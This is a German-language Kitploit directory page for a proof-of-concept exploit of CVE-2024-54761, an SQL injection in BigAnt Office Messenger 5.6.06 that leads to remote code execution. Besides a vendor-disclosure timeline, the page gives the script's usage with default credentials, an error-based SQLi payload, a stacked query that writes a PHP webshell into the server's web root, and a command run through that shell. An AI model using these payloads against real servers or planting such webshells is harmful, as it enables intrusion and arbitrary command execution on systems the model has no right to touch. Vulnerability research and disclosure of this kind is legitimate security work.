Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-54761 — CVE-2024-54761 PoC | Kitploit
Tools/GitHubGitHub/nscan9/cve-2024-54761
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubnscan9/cve-2024-54761

CVE-2024-54761

CVE-2024-54761 PoC

Repository anzeigen
1vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

BigAnt Office Messenger 5.6.06 RCE durch SQL-Injection

Eine SQL-Injection-Schwachstelle in BigAnt Messenger führt zu einer RCE-Schwachstelle. Befolgen Sie die Schritte, um diese auszunutzen.

Verwendung:

root@kitploit:~
CVE-2024-54761.py [-h] -r RHOST [-p RPORT] [-u USERNAME] [-P PASSWORD]
options:
  -h, --help            show this help message and exit
  -r, --rhost RHOST     Target IP address
  -p, --rport RPORT     Target port (default 8000)
  -u, --username USERNAME
                        Login username (default admin)
  -P, --password PASSWORD
                        Login password (default 123456)

Exploit mit Standard-Zugangsdaten ausführen.

root@kitploit:~
python CVE-2024-54761.py -r 127.0.0.1
Exploit

Manueller Exploit

Extrahieren Sie die verwendete Datenbankversion über den dev_code-Parameter, der SQLi ausgesetzt ist.

root@kitploit:~
# Payload
?dev_code=AND EXTARCTVALUE(rand(),concat(CHAR(126),version(),CHAR(126)))--

SQLI-Version

Laden Sie mithilfe von SQL-Stack-Queries eine PHP-Webshell auf das Ziel hoch.

root@kitploit:~
# Payload
?dev_code=;SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE 'C:/Program Files (x86)/BigAntSoft/IM Console/im_webserver/htdocs/shell.php'-- -

Webshell erstellen 1

Nachweis der Befehlsausführung:

root@kitploit:~
/shell.php?cmd=whoami

whoami dir-Befehl

Zeitleiste

31-10-2024: Schwachstellen per E-Mail an den Anbieter übermittelt

31-10-2024: Anbieter per E-Mail kontaktiert, keine Antwort

15-11-2024: Anbieter per E-Mail kontaktiert, keine Antwort

15-11-2024: CVEs beantragt

Referenzen

https://gist.github.com/nscan9/a31982c90ab40a8e00373bf15efbf52a

https://www.bigantsoft.com

Tool herunterladen